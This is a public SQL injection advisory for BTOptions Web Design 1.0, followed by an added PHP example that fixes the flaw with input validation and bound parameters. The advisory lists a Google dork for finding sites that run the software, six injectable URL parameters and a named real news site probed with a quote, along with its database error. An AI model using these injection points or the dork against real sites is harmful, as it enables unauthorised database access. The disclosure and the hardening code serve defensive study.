BTOptions Web Design version 1.0 suffers from a remote SQL injection vulnerability.
##############################################################################
# Exploit Title : BTOptions Web Design 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/12/2018
# Vendor Homepage : btoptions.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Version Information : 1.0 - WebServer Apache
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018060262
##############################################################################
Designed & Developed by Web Based Business Systems BTOptions.Com SQL Injection Vulnerability
##############################################################################
# Google Dork : intext:''Designed & Developed by Web Based Business Systems, BT Options.''
# Exploits :
/rataperata_yana_gamana.php?image=[SQL Inj]
/newspack.php?issue=[SQL Inj]
/bnb.php?bnbId=&issue=[SQL Inj]
/hbr.php?issue=[SQL Inj]
/financial_times.php?issue=[SQL Inj]
/article.php?article=[SQL Inj]
##############################################################################
# Example Site :
businesstoday.lk/financial_times.php?issue=323'
=> [ Proof of Concept for SQL Inj ] => archive.is/qKjL4
# SQL Database Error :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and viewonhome=1 ORDER BY article.adddate DESC' at line 1
##############################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
##############################################################################
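
The error text above shows the request value being placed directly into the SQL statement ahead of `and viewonhome=1 ORDER BY article.adddate DESC`. The following is an added example of a hardened handler for an `issue`-style parameter; it is not the vendor's code or part of the original advisory. The names `article`, `viewonhome` and `adddate` come from the error message, while the `issue` and `title` columns, the query shape, the function names and the in-memory SQLite sample data are assumptions made so the example runs offline.

```php
<?php
// Added example: strict input validation plus a bound parameter for ?issue=.
// `article`, `viewonhome`, `adddate` are taken from the error text in the advisory;
// the `issue` and `title` columns and the overall query shape are assumed.

// Constructed sample data in an in-memory SQLite database so the script runs
// offline; the same PDO calls apply unchanged to a MySQL DSN.
function demo_db(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE article (id INTEGER PRIMARY KEY, issue INTEGER,
                title TEXT, viewonhome INTEGER, adddate TEXT)');
    $pdo->exec("INSERT INTO article (issue, title, viewonhome, adddate) VALUES
                (323, 'Lead story', 1, '2018-06-01'),
                (323, 'Hidden draft', 0, '2018-06-02'),
                (324, 'Next issue', 1, '2018-07-01')");
    return $pdo;
}

// Accept only a positive decimal integer. Anything else, including the
// advisory's 323' test value, is rejected before a query is built.
function parse_issue($raw): ?int {
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// The value is bound as a typed parameter, so it cannot alter the statement text.
function articles_for_issue(PDO $pdo, int $issue): array {
    $stmt = $pdo->prepare('SELECT title FROM article
                           WHERE issue = :issue AND viewonhome = 1
                           ORDER BY adddate DESC');
    $stmt->bindValue(':issue', $issue, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$pdo = demo_db();
foreach (['323', "323'", '', 'abc'] as $raw) {   // constructed request values
    $issue = parse_issue($raw);
    if ($issue === null) {
        // Generic rejection; no database error text reaches the client.
        echo json_encode($raw) . " -> 400 Bad Request\n";
        continue;
    }
    echo json_encode($raw) . ' -> ' . json_encode(articles_for_issue($pdo, $issue)) . "\n";
}
```

The same validation and binding would apply to every parameter listed under "Exploits" above, and production error display should be turned off so raw MySQL messages are logged server-side instead of returned in the page.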